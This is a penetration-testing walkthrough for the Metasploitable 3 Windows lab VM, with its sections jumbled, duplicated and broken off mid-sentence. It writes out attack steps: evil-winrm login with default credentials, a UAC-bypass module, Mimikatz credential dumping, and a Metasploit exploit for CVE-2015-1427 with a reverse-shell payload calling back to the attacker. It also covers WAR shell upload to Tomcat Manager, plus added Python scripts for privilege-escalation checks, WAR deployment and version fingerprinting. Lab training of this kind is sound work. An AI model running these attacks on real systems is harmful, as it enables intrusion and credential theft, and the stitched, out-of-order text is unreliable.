Sometimes the simplest attack vector is the most effective: Windows Server 2008 R2 exposes WinRM on TCP port 5985, and Metasploitable 3 ships with default credentials (vagrant / vagrant) that grant immediate access.
    use exploit/windows/local/bypassuac_dotnet_profiler
    set SESSION SESSION_ID
    exploit

5. Post-Exploitation and Flag Retrieval
Metasploitable 3 comes with multiple user accounts, including interesting names referencing Star Wars characters.
Check for MS17-010: use the auxiliary module auxiliary/scanner/smb/smb_ms17_010 to see if the target is vulnerable before throwing the exploit.
Remote code execution via legacy script injection vulnerabilities.

Phase 2: Initial Access & Exploitation
If the credentials match, spawn a remote shell with evil-winrm:

    evil-winrm -i 10.0.2.15 -u vagrant -p vagrant

5. Post-Exploitation and Privilege Escalation
Once initial access is secured, the next goal is upgrading permissions to NT AUTHORITY\SYSTEM.

Local Information Gathering
From an elevated Meterpreter session, load the Kiwi (Mimikatz) extension to dump plaintext credentials and NTLM hashes from memory:

    load kiwi
    creds_all
Gaining initial access is often just the beginning. If your session is running as a low-privileged user (such as tomcat or localadmin), you must escalate privileges to NT AUTHORITY\SYSTEM.

Local Information Gathering

Run basic environment checks inside your initial shell:

    whoami /priv
    systeminfo
    wmic product get name,version

In the whoami /priv output, an enabled SeImpersonatePrivilege is what makes the token-impersonation path (JuicyPotato) viable; AlwaysInstallElevated only works when the policy value is 1 in both HKLM and HKCU.

1. Exploiting AlwaysInstallElevated
Or manually upload and run JuicyPotato.exe .
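To make the enumeration step above actionable, here is an added example (not code from the original walkthrough) that parses the output of whoami /priv and reg query and reports which escalation path applies. The sample outputs are constructed to mimic Windows Server 2008 R2; the registry key names are the real AlwaysInstallElevated locations, and the rule that both hives must be set is Microsoft's documented behaviour.

```python
import re

# Constructed sample of `whoami /priv` output for a service account
# (not captured from a real host).
WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed samples of:
#   reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#   reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# REG_MISSING mimics the error reg.exe prints when the value does not exist.
REG_HKLM = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
REG_HKCU = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
REG_MISSING = "ERROR: The system was unable to find the specified registry key or value."


def parse_privileges(text):
    """Map privilege name -> 'Enabled'/'Disabled' from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def _dword_value(reg_output):
    """Extract the REG_DWORD value of AlwaysInstallElevated; 0 when absent."""
    m = re.search(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)", reg_output)
    return int(m.group(1), 16) if m else 0


def always_install_elevated(hklm_output, hkcu_output):
    """The policy is only effective when BOTH hives carry the value 1."""
    return _dword_value(hklm_output) == 1 and _dword_value(hkcu_output) == 1


def escalation_paths(whoami_output, hklm_output, hkcu_output):
    """Return the escalation techniques the enumeration output supports."""
    paths = []
    privs = parse_privileges(whoami_output)
    if privs.get("SeImpersonatePrivilege") == "Enabled":
        paths.append("token impersonation (JuicyPotato)")
    if always_install_elevated(hklm_output, hkcu_output):
        paths.append("AlwaysInstallElevated (.msi runs as SYSTEM)")
    return paths


if __name__ == "__main__":
    for p in escalation_paths(WHOAMI_PRIV, REG_HKLM, REG_HKCU):
        print("candidate:", p)
```

Feed it the real command output from the target shell instead of the constructed samples; an empty list means neither of the two shortcuts on this page applies and you need a different vector.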
Set the module options (confirm the index of the Windows entry with show targets before running):

    set RHOSTS TARGET_IP
    set RPORT 9200
    set TARGET 1    # Windows target
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST YOUR_IP
    set LPORT 4445
Clone the repository in your terminal:

    git clone https://github.com

Navigate to the directory:

    cd metasploitable3
If you want to do this without Metasploit, upload your shell.war file manually through the Tomcat Manager.
If you want to build a custom image from source, use:
Deploy: in the Tomcat Manager dashboard, scroll down to WAR file to deploy, upload your shell.war file, and click Deploy. Browse to the deployed context path to trigger the JSP.
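For the manual route, here is an added example (not code from the original walkthrough) that builds a minimal WAR in memory and pushes it through the Tomcat Manager text interface instead of the dashboard form. It assumes the manager account holds the manager-script role (the HTML dashboard only needs manager-gui) and uses placeholder host, port and credentials. The JSP only reports which account Tomcat runs as, which is the fact that decides whether the privilege-escalation steps on this page are needed next.

```python
import base64
import io
import urllib.request
import zipfile

# Minimal deployment descriptor so Tomcat serves index.jsp at the context root.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <welcome-file-list><welcome-file>index.jsp</welcome-file></welcome-file-list>
</web-app>
"""

# Harmless probe page: prints the Windows account the Tomcat service runs as.
INDEX_JSP = """<% out.println("tomcat runs as: " + System.getProperty("user.name")); %>
"""


def build_war(jsp_source=INDEX_JSP):
    """Return WAR bytes: a zip containing WEB-INF/web.xml and a root index.jsp."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", WEB_XML)
        z.writestr("index.jsp", jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """List the archive members (sanity check before uploading)."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        return sorted(z.namelist())


def war_entry(war_bytes, name):
    """Read one member back as text."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        return z.read(name).decode()


def _manager_request(host, port, user, password, url_path, data=None, method="GET"):
    """Authenticated call to the Tomcat Manager text interface (network)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(
        f"http://{host}:{port}{url_path}", data=data, method=method,
        headers={"Authorization": f"Basic {token}"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode()


def deploy(host, user, password, war_bytes, path="/probe", port=8080):
    """PUT the WAR to /manager/text/deploy; Tomcat answers 'OK - Deployed ...'."""
    return _manager_request(host, port, user, password,
                            f"/manager/text/deploy?path={path}&update=true",
                            data=war_bytes, method="PUT")


def undeploy(host, user, password, path="/probe", port=8080):
    """Remove the context again once you have read the result."""
    return _manager_request(host, port, user, password,
                            f"/manager/text/undeploy?path={path}")


if __name__ == "__main__":
    war = build_war()
    print(war_entries(war))
    # Placeholder target and credentials; replace before use:
    # print(deploy("TARGET_IP", "MANAGER_USER", "MANAGER_PASS", war))
```

After deploy returns OK, fetch http://TARGET_IP:8080/probe/ and read the account name; undeploy afterwards so the probe does not linger on the box.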
The Windows version of Metasploitable 3 is frequently breached through its web application stack. One of the most classic entry points is the Jenkins Script Console.

Unauthenticated Access: Often, the Jenkins Script Console is left unprotected.

Remote Code Execution (RCE): Since Jenkins runs as a high-privileged service (often
Metasploitable 3 Windows runs an outdated version of Elasticsearch vulnerable to Remote Code Execution (RCE) via CVE-2015-1427. This vulnerability allows attackers to bypass the Groovy sandbox restrictions on dynamic scripts.

Exploitation via Metasploit: initialize the Metasploit Framework:

    msfconsole

Search for the module (exploit/multi/elasticsearch/search_groovy_script):

    search elasticsearch groovy
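Before launching the module, it is worth confirming that the service on port 9200 is really in the affected range. The following is an added example (not code from the original walkthrough) that fingerprints Elasticsearch from its GET / banner and applies the NVD version range for CVE-2015-1427 (before 1.3.8, and 1.4.x before 1.4.3). The banner below is constructed, not captured from a real host; fetch_banner is the live call. This is a version check only, not an exploit, and the version is self-reported, so still run the module's check against the target.

```python
import json
import re
import urllib.request

# Constructed banner in the shape Elasticsearch 1.x returns for GET /
# (not captured from a real host).
SAMPLE_BANNER = json.dumps({
    "status": 200,
    "name": "example-node",
    "version": {"number": "1.4.2", "build_hash": "0000000", "lucene_version": "4.10.2"},
    "tagline": "You Know, for Search",
})


def fetch_banner(host, port=9200, timeout=5):
    """Live check: GET http://host:port/ and return the JSON body as text."""
    with urllib.request.urlopen(f"http://{host}:{port}/", timeout=timeout) as resp:
        return resp.read().decode()


def parse_version(banner_text):
    """Return (major, minor, patch); None when the banner is not Elasticsearch."""
    data = json.loads(banner_text)
    if data.get("tagline") != "You Know, for Search":
        return None
    parts = data["version"]["number"].split(".")
    # Drop suffixes such as '-SNAPSHOT' or '-beta1' from the last component.
    return tuple(int(re.sub(r"\D.*$", "", p)) for p in parts[:3])


def affected_by_cve_2015_1427(version):
    """NVD range for CVE-2015-1427: before 1.3.8, and 1.4.x before 1.4.3."""
    return version < (1, 3, 8) or (1, 4, 0) <= version < (1, 4, 3)


def assess(banner_text):
    """Human-readable verdict for one banner."""
    version = parse_version(banner_text)
    if version is None:
        return "not elasticsearch"
    label = ".".join(str(n) for n in version)
    verdict = "vulnerable" if affected_by_cve_2015_1427(version) else "not in CVE-2015-1427 range"
    return f"{label}: {verdict}"


if __name__ == "__main__":
    print(assess(SAMPLE_BANNER))
    # Live use: print(assess(fetch_banner("TARGET_IP")))
```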
Host-Only or NAT Network. Verify that both VMs can ping each other but are isolated from your local production network.

2. Phase 1: Information Gathering and Scanning